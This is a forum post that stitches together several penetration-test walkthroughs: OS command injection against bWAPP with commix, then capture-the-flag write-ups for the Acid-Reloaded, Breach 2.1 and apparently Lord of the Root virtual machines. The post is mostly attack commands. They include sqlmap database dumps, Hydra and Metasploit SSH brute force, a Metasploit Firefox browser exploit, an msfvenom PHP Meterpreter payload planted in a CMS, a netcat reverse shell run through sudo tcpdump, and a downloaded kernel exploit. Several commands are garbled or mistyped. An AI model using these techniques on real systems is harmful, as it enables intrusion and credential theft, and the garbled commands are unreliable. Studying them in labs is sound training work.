Login

**NINZA** · 04-25-2020, 04:20 AM

0			0

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

[To see content please register here]

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

Very first you need to setup bWAPP lab in your XAMPP or WAMP server, for this you can visit to my previous article web Pentest lab setup using bwapp

[To see content please register here]

.

Now I m going to perform os command injection attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!

Set security level: low

Look at below image I have set the security level low, from option choose you bug select os command injection now and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxy option then click to inception is on button, come back to bWAPP and now click to DNS.

As you can see I have capture the cookie in burp suite.

Open the terminal in kali Linux and type the commix command.

From fetched data under burp suite copy referrer, cookie and target use this in the following command

commix –url=”http://192.168.1.103:81/bWAPP/commandi.php” –cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0″ –data=target=”192.168.1.103&form=submit”

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful commix provided a commix os shell

Commix (os_shell) > syseteminfo

Set security level: medium

Look at below image now I have set the security level medium, from option choose you bug select os command injection now and click on hack.

Repeat the process again as above, Type the IP in the DNS lookup field and just after that start the burp suite.

Click to inception is on, come back to bWAPP and now click to DNS. As you can see I have capture the cookie for medium level in burp suite.

From fetched data under burp suite copy referrer, cookie and target use this in the following command.

commix–url=”http://192.168.1.103:81/bWAPP/commandi.php”–cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=1″–data=target=”192.168.1.103&form=submit”

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful in medium security and again commix provided a commix os shell.

Commix (os_shell) > ipconfig

Set security level: high

After achieving os shell of low and medium my next mode is high security, now I m trying to bypass this level by repeating same process once again.

Set security high, choose your bug os command injection and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. From fetched data under burp suite copy referrer, cookie and target use this in the following command.

commix–url=”http://192.168.1.103:81/bWAPP/commandi.php”–cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=2″–data=target=”192.168.1.103&form=submit”

Type ‘y’ to resume the classic injection point and to pseudo terminal shell. We have successfully bypass high level also with the same process.

Commix (os_shell) > systeminfo

The named of the Virtual machine is “Acid-Reloaded”, It is created by Avinash Thappa. This Virtual Machine contains both network logics and web logics. You will need to extract the RAR and run the vmx using VMplayer. The machine has DHCP active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game.
GOAL: Escalate the privileges to the root user and capture the flag. Once anyone able to beat the box then shoots me a mail
Penetrating Methodologies

Network scanning (netdiscover, nmap)
Port knocking (Netcat)
Abusing HTTP web service (Brupsuite)
SQL injection (Sqlmap)
SSH Brute-Force (Hydra)
Access PTY shell (ssh login)
Kernel privilege escalation

Let’s Begin!!
As always start by finding our target
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

This tells us that our target is 192.168.1.106. Now is time to scan with nmap.
nmap -A 192.168.1.106
1
nmap -A 192.168.1.106
[Image: 2.png?w=687&ssl=1]

The result of nmap shows us that only port 22 is open with the service of SSH. Let’s check out this 22 port.
ssh 192.168.1.106
1
ssh 192.168.1.106
Wann Knock me out??? Sounds like port knocking hint, therefore, let’s go for port knocking.
[Image: 3.png?w=687&ssl=1]

Checking out port 22 hints (3.2.1 let’s Start the Game) we will use the netcat Port Knocking technique.
nc 192.168.1.106 3
nc 192.168.1.106 2
nc 192.168.1.106 1
1
2
3
nc 192.168.1.106 3
nc 192.168.1.106 2
nc 192.168.1.106 1
[Image: 4.png?w=687&ssl=1]

Let’s scan with nmap again.
nmap -p- -A 192.168.1.106
1
nmap -p- -A 192.168.1.106
Port knocking helped us to open port 33447 on which the service of HTTP was redirected.
[Image: 5.png?w=687&ssl=1]

Now open the target IP on the browser using this port.

[To see content please register here]

1

[To see content please register here]

A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. It’s time to use dirb for a directory brute-force attack.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

It put-up so many web directories but to me /bin/ might be interesting as it might have a shell system. No harm in checking it out in browsing so let’s do that.
[Image: 8.png?w=687&ssl=1]

And it’s a login portal. Now let’s check its page source.
[Image: 9.png?w=687&ssl=1]

In the page source, there is a directory called: includes/validation.php. I decided to check it out.
Unfortunately! I could not find anything on it. So decided to use DirBuster to find out about directories.
[Image: 10.png?w=687&ssl=1]

In the DirBuster give the URL and for wordlist use medium 1.0-word list. And then click on the Start button and it will start finding directories. So it found so many PHP files as shown below.
[Image: 11.png?w=687&ssl=1]

I checked every directory related to the bin and only /bin/dashboard.php was useful. When I opened it in the browser, I found nothing useful so I looked into the page source and even that proved to be non-useful.
[Image: 11_0.png?w=687&ssl=1]

When nothing helped I decided to capture its cookies using BurpSuite. To capture the cookies using BurpSuite, set proxy and then turn on the interception and then simply reload the page. When the cookies are captured just add the following below the Host.
Referer :

[To see content please register here]

And now as soon as you will hit the forward button it will automatically log in.
[Image: 11_2.png?w=687&ssl=1]

On the page it says to click and when you do that it will redirect to the following page.
[Image: 12.png?w=687&ssl=1]

There was nothing on the redirected page or its page source. So decided to check for SQL injection, and search for a web page with id=1. Luckily we have made the right prediction and got the following result for id=1.
[Image: 13.png?w=687&ssl=1]

Using a single quote (‘) I check for SQL injection and got MySQL error message which means the web application is vulnerable to SQL injection.
[Image: 14.png?w=687&ssl=1]

So decided to use SQLMap.
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 --dbs --tamper=space2comment --batch
1
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 --dbs --tamper=space2comment --batch
[Image: 15.png?w=687&ssl=1]

We got database name secure_login, now let’s find out tables.
[Image: 16.png?w=687&ssl=1]

sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 -D secure_login --table --tamper=space2comment
1
sqlmap -u 192.168.1.106:33447/bin/l33t_haxor.php?id=1 -D secure_login --table --tamper=space2comment
It shows us the name of the table i.e. UB3R/strcpy.exe
[Image: 17.png?w=687&ssl=1]

When I opened /UB3R/strcpy.exe in the browser, a dialogue box opened and asked to save a file and so I did.
[Image: 18.png?w=687&ssl=1]

Now use the file command to know more it and found PDF document V 1.5, then used the foremost tool which is a forensic tool which is used to recover files using their headers and footers.
file strcpy.exe
foremost strcpy.exe
1
2
file strcpy.exe
foremost strcpy.exe
[Image: 19.png?w=687&ssl=1]

As soon as you will run the above command a folder is created with the name of output. Let’s check out this folder.
cd output
ls
1
2
cd output
ls
There is a text file in the folder with the name of an audit, I decided to read it through cat command.
cat audit.txt
1
cat audit.txt
[Image: 20.png?w=687&ssl=1]

There is a .rar which I decided to unrar.
unrar x 00000213.rar
1
unrar x 00000213.rar
On unzipping there are two files that have been extracted i.e. acid.txt and lol.jpg. I decided to read acid.txt
cat acid.txt
1
cat acid.txt
This .txt tells us that we are on the right path. So of course next I opened lol.jpg
exiftool lol.jpg
1
exiftool lol.jpg
But found nothing. So I unzipped it.
unrar e lol.jpg
1
unrar e lol.jpg
[Image: 21.png?w=687&ssl=1]

Unzipping the lol.jpg gave me two files again, one was “hint.txt” and another “Avinash.contact”. So I opened hint.txt which told me to go with Avinash.contact, so I next opened.
cat hint.txt
cat Avinash.contact
1
2
cat hint.txt
cat Avinash.contact
[Image: 22.png?w=687&ssl=1]

There was a base64 code given in the file so we decoded the base64 code with help of echo as shown and it turned to be NooB@123.
Syntax: echo Base64 text | base64 -d
[Image: 23.png?w=687&ssl=1]

And then applied brute force on SSH using the text file that I just created with random words. With help of the following command, we try to crack the password for SSH and successfully obtained two credential for SSH login.
hydra -L user.txt -p NooB@123 -u 192.168.1.106 ssh
1
hydra -L user.txt -p NooB@123 -u 192.168.1.106 ssh
[Image: 24.png?w=687&ssl=1]

And it gave us makke: NooB@123 as username and password respectively. And so I logged in with SSH.
ssh [email protected]
1
ssh [email protected]
Give the password when asked. And when I logged in I checked kernel’s version and tried to download its exploit but it didn’t happen. All the options for downloading were blocked so started exploring.
So I directly went for the/bin.
cd /bin
ls
1
2
cd /bin
ls
[Image: 25.png?w=687&ssl=1]

In the/bin, there were files called overlayfs. This is a famous exploit so I executed it
./overlayfs
id
ls –la
1
2
3
./overlayfs
id
ls –la
And then, fortunately, there was a flag.txt.
cat flag.txt
1
cat flag.txt
[Image: 26.png?w=687&ssl=1]

Breach 2.1 is the second VM in the multi-series Boot2Root CTF challenges. This is developed by mrb3n. It is a high-level challenge and shows a lot of scenario including plenty of twists and trolls along the way. It works on a static IP i.e 192.168.110.151, therefore, we have configured our adapter to be a host-only adapter.

You can download it from

[To see content please register here]

WalkThrough

As our VM is hosted on static IP, there is no need to discover our target we will directly start by scanning our target.

nmap –p- -A 192.168.110.151

Nmap shows us that only three ports are open which are: 111, 52263, 65535 with the services of rpbind, status, SSH respectively. Let’s check the SSH port.

ssh 192.168.110.151 –p 65535

Here,

-p = a specified port

Let’s assume here that password is “inthesource” because in the area between the hashes it says “Peter, if that’s you – the password is in the source”. that means Peter is the username and the password is inthesource. I gave it a try.

ssh [EMAIL=The contents of this section are hidden for your group]The contents of this section are hidden for your group[/EMAIL]
Register or Login –p 65535

It logged in but I couldn’t find anything. So I just gave nmap another try and there was port 80 open this time.

nmap -p- -A 192.168.110.151

As the port 80 just opened, to our luck we can open this in our browser now.
[Image: 5.png?w=687&ssl=1]

Now on the webpage, it says “Welcome to Initech Cyber consulting. LLC” and something about BEEF. Even in the page source, I found nothing so I decided to use DirBuster. It showed me a lot of directories but the one that stole my interest was /blog/.

So I opened it in the browser. It opened a travel blog. There was a search box on the blog so I tried SQL injection by using the single inverted comma (‘).

This way I found SQL vulnerability so I used SQLMap next.

Sqlmap –u

[To see content please register here]

–dbs

This command will start the process and it will show you five table names in the database.
[Image: 10.png?w=687&ssl=1]

Out of this five oscommerce is the most famous CMS of e-commerce websites. And this blog was also related to commerce. So I decided to use my next SQLMap command against this table in database.

Sql –u

[To see content please register here]

= –dbs –D oscommerce –tables –dump

Execution of this command will give your username and password. The username is admin but the password that you will receive will be MD5 hash value.

You can crack this MD5 hash value using any third party or you can use an online method as I did.
[Image: 13.png?w=687&ssl=1]

Upon cracking the password you will get here is 32admin. Now I have usernames and password but I do not have a login portal. So I started exploring the blog but couldn’t find anything. So cooped and pasted it copyright information on google.

And upon search the google I found the first link of exploit-db.com that means there is an exploit for the said. And that’s why I opened the linked and explored it.

In the exploit there was information about XSS code and a link was provided. Now I know that BEEF does XSS work and on the very first webpage to there was something about BEEF. So naturally, I started working with BEEF.

Now BEEF automatically gives us a script which includes a link. I copied that link and opened the BEEF panel in the browser.

Here, go to register option and paste the copied link in the username area and give and random password and email.
[Image: 18.png?w=687&ssl=1]

As you can see BEEF will give you a session.
[Image: 19.png?w=687&ssl=1]

From the entire cross sitting details, BEEF have to show please pay close attention to the browser. You will find that our target is using FireFox 15.0 and fortunately there is an exploit for this in Metasploit.

Now, open Metasploit and type the following command to use the said exploit :
use exploit/multi/browser/firefox-proto_crmfrequest
set paypload generic/shell_reverse_tcp
set srvhost 192.168.110.128
set uripath shell
set lhost 192.168.110.128
exploit
[Image: 21.png?w=687&ssl=1]

Performing this exploit will give you an URL like in my case URL is

[To see content please register here]

:8080/shell. Copy this link and go to the BEEF panel. In the BEEF panel go to the Commands tab > Hooked Domain > Redirect Browser. Paste the copied link here in the Redirect URL text box.

As you follow the above steps you will have a shell session.
[Image: 23.png?w=687&ssl=1]

Now here is a trick, you will lose the session as you as you will get it. Here you will have to transfer your shell session to meterpreter session within 5 seconds and for that type :

use post/multi/manage/shell_to_meterpreter

set session 1

run

And you will have a session. Open that session and you will reach the terminal. In the terminal, lets check out the home folder.

cd /home

ls

In the home folder, you will three folders i.e. bill, milton, peter. It was not of much use so went ahead and checked network status.

netstat -tln

Checking the network status gave me some coordinates. So I checked them on Google map and found that it was the coordinates of Houston. Now, this Houston word can be a password or username so I just made a mental note of it for later use.

Except this I found nothing so I decided to use Telnet in order to get a reply and for that used the following command :
telnet 127.0.0.1 2323
[Image: 27.png?w=687&ssl=1]

This time it replied with a question i.e. whose stapler is it? Now I don’t know the answer so I just pressed enter. So to know the answer I wanted to search Milton user. And for this, commands are:

find /usr –user milton

cat /usr/local/bin/cd.py

Now in the python file, it showed me the programming and as you can see in the image you the coding shows that correct answer “mine”.

So, I repeated my steps to reach the same question. And gave the answer as mine.

Then I checked the status of network and observed that port 8888 opened.
[Image: 30.1.png?w=687&ssl=1]

I checked this port in the browser and found two directories.
[Image: 30.png?w=687&ssl=1]

Out of these, I opened oscommerce link and the following page opened.
[Image: 31.png?w=687&ssl=1]

I had the username and password for this CMS so I Google its admin page and logged in with the admin as username and admin as password.

Note: we have cracked the MD5 value of password that resulted in 32admin but here is is no use of 32. The password is admin.

It logged in but to upload the malicious code you have to follow the path is: file manage > includes > work. Here you have to upload your php code.

To generate the code go to the terminal in Kali and type:
Msfvenom –p php/meterpreter/reverse-tcp lhost-192.168.110.128 lport=8443 –f raw
[Image: 34.png?w=687&ssl=1]

Copy <? to die(); and save it in a .php document.
[Image: 35.png?w=687&ssl=1]

Before running the file goes to mestaspoit and start multi/handler.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 8443
exploit
It will give you the meterpreter session and then type the combination of following commands to reach terminal :
shell
<strong><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py</code></strong>
1
2
<strong><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py</code></strong>
id
Next type :
/var/www/html2/oscommerce/includes/work
[Image: 36.png?w=687&ssl=1]

Still, we haven’t reached root but we found blumbergh, let’s see what privileges it has.
sudo –l
Ok. So it saya that it can rum a tcpdump file as root. That’s interesting. To manipulate tcpdump I need to run a set of following comands:
Echo $’id\n/bin/netcat 192.168.110.128 443 –e /bin/bash’ > /tmp/.test
Chmod +x /tmp/.test
Sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
[Image: 37.png?w=687&ssl=1]

Tough part is over! Now I just need to run netcat :
nc –nlvp 443
Let’s confirm if we have reached root or not and if yes, let’s see what it has to offer :
id
cd /root
ls
[Image: 39.png?w=687&ssl=1]

There ia flag.py file in /root. So no waiting. Lets capture the flag.
python .flag.py
[Image: 40.png?w=687&ssl=1]

HURRAYYYY!!!! The flag has been captured!!! Enjoy!

This is another Boot2Root challenge which has been prepared by KoocSec for hacking exercises. He prepared this through the inspiration of his OSCP exam. It is based on the concepts of great novel-turned-movie The Lord Of The Ring.
You can download this VM from –>

[To see content please register here]

Breaching Methodology

Network Scanning (Nmap)
Port knocking
Use robot.txt
Login Form Based SQL Injection (Sqlmap)
SSH brute force (Metasploit)
Get into the shell for privilege escalation
Import python one-liner for proper TTY shell
Kernel Privilege Escalation
Get Root access and capture the flag.

Firstly, we will find our target.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

Our target is 192.168.1.101
Now run the nmap script to know the ports and protocols.
nmap -p- -A 192.168.1.101
1
nmap -p- -A 192.168.1.101
[Image: 2.png?w=687&ssl=1]

Nmap has resulted in showing us that only 22 port is open with the service of SSH. Port 80 is not open that means we don’t have a facility of opening this server in the browser. Therefore we will try to see what port 22 has to offer and so go to your terminal in Kali and type:
ssh 192.168.1.101 22
1
ssh 192.168.1.101 22
[Image: 3.png?w=687&ssl=1]

When I searched SSH it said “Knock Friend To Enter” and “Easy as 123” and then it asks for a password that we do not know yet. Now, this is hinting towards port knocking. Let’s try it:
nmap -r -Pn –p 1,2,3 192.168.1.101
1
nmap -r -Pn –p 1,2,3 192.168.1.101
Now again fire up nmap scan. This time hopefully we will have more than one port in the result.
nmap -p- -A 192.168.1.101
1
nmap -p- -A 192.168.1.101
[Image: 4.png?w=687&ssl=1]

As you can see there is one more port open in comparison to our previous scan i.e. 1337 which has the service of HTTP and this is all we wanted as by default port 80 was not open. Let’s open our target IP with this port.
192.168.1.101:1337
1
192.168.1.101:1337
[Image: 5.png?w=687&ssl=1]

It opens a page with only one image, as shown above, then we have also checked its source code but didn’t get any clue. Generally, there are always some chances of getting robots.txt file inside a web directory, therefore, while penetrating any system we should always check for the robots.txt file.
Here we had tested for robots.txt it in url 192.168.1.101:1337/robots.txt, a new web page will following image gets opened.
[Image: 6.png?w=687&ssl=1]

After then we looked into its source code and found base 64 encoded value.
[Image: 7.png?w=687&ssl=1]

Further, we have decoded it twice in kali as shown below and found a directory from inside that. Let’s open it.
[Image: 8.png?w=687&ssl=1]

And now we are face to face with a login portal. Now here I will try to log in with help of SQL injection and for that, we can use sqlmap.
[Image: 9.png?w=687&ssl=1]

Since we don’t know the exact username and password, therefore, we have used SQLMAP for login form based injection for retrieving the database name and login credential by executing following command.
sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
1
sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
[Image: 10.png?w=687&ssl=1]

And it will start gathering the database.
[Image: 11.png?w=687&ssl=1]

And finally, it will show you the database of usernames and passwords.
[Image: 12.png?w=687&ssl=1]

Moving on save all of these usernames and password in two different text files. And use this text files in an SSH log in attack with the help of Brute force method. And to execute this attack go to the terminal in Kali and open Metasploit by typing msfconsole and further type :
use auxiliary/scanner/ssh/ssh_login
msf exploit (scanner/ssh/ssh_login)>set rhosts 192.168.1.101
msf exploit (scanner/ssh/ssh_login)>set user_file /root/Desktop/user.txt
msf exploit (scanner/ssh/ssh_login)>set pass_file /root/Desktop/pass.txt
msf exploit (scanner/ssh/ssh_login)> set stop_on_success true
msf exploit (scanner/ssh/ssh_login)>exploit
1
2
3
4
5
6
use auxiliary/scanner/ssh/ssh_login
msf exploit (scanner/ssh/ssh_login)>set rhosts 192.168.1.101
msf exploit (scanner/ssh/ssh_login)>set user_file /root/Desktop/user.txt
msf exploit (scanner/ssh/ssh_login)>set pass_file /root/Desktop/pass.txt
msf exploit (scanner/ssh/ssh_login)> set stop_on_success true
msf exploit (scanner/ssh/ssh_login)>exploit
And as a result, it will show you the correct username and password i.e. smeagol:MyPreciousR00t. Moreover, Metasploit serves you an additional benefit by providing a remote system command shell as unauthorized access into the victim’s system. Now start penetrating for accessing root privilege. Then to access proper TTY shell we had import python one line script by typing following:
python -c 'import pty;pty.spawn("/bin/bash")'
1
python -c 'import pty;pty.spawn("/bin/bash")'
Now you will reach the terminal. Here, type the following command to know the version of the kernel:
lsb_release -a
1
lsb_release -a
[Image: 13.png?w=687&ssl=1]

The version is 14.04 and luckily we have an exploit for this version. In the Kali terminal lets the search for the appropriate exploit and for this type:
searchsploit ubuntu 14.04
1
searchsploit ubuntu 14.04
[Image: 15.png?w=687&ssl=1]

Copy the exploit on the desktop with help of cp command and run HTTP python server for transferring it into the target’s machine.
[Image: 16.png?w=687&ssl=1]

First, we need to f download the exploit and compile it and for this type:
wget

[To see content please register here]

gcc 39166.c -o shell
1
2
wget

[To see content please register here]

gcc 39166.c -o shell
The first command in the above commands will download the exploit and the second one will compile it and save it in the file named shell. Next, we have to give permission to the shell and then, at last, we have to run it.
chmod 777 shell
./shell
1
2
chmod 777 shell
./shell
Now let’s get into the root folder and see what it has to offer:
cd /root
ls
1
2
cd /root
ls
Here, we have found a text file with the name flag which was our ultimate goal. So now no more waiting lets read it.
cat Flag.txt
1
cat Flag.txt
[Image: 17.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis